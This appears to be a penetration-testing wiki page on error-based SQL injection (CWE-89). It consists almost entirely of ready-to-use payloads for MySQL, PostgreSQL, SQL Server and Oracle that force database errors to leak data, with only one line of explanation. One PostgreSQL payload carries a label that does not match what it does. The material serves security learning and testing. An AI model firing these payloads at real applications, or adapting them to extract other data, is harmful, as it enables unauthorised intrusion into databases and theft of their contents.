Error-Based SQL Injection


CWE	CWE-89
Tools	sqlmap, ghauri
Difficulty	🟡 intermediate

Error-Based Extraction

Error-based injection extracts data through database error messages. This requires verbose error reporting to be enabled on the target.

MySQL

-- ExtractValue method
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--

-- UpdateXML method
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--

-- Double query method
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

PostgreSQL

-- CAST error
' AND 1=CAST((SELECT version()) AS INT)--

-- Array to string with error
' AND 1=1/(SELECT 0 FROM (SELECT version())x)--

Microsoft SQL Server

-- CONVERT method
' AND 1=CONVERT(int,(SELECT @@version))--

-- CAST method
' AND 1=CAST((SELECT @@version) AS int)--

Oracle

-- UTL_INADDR
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM=1))--

-- XMLType
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE ROWNUM=1))--

Error-Based Extraction​

MySQL​

PostgreSQL​

Microsoft SQL Server​

Oracle​

Error-Based Extraction

MySQL

PostgreSQL

Microsoft SQL Server

Oracle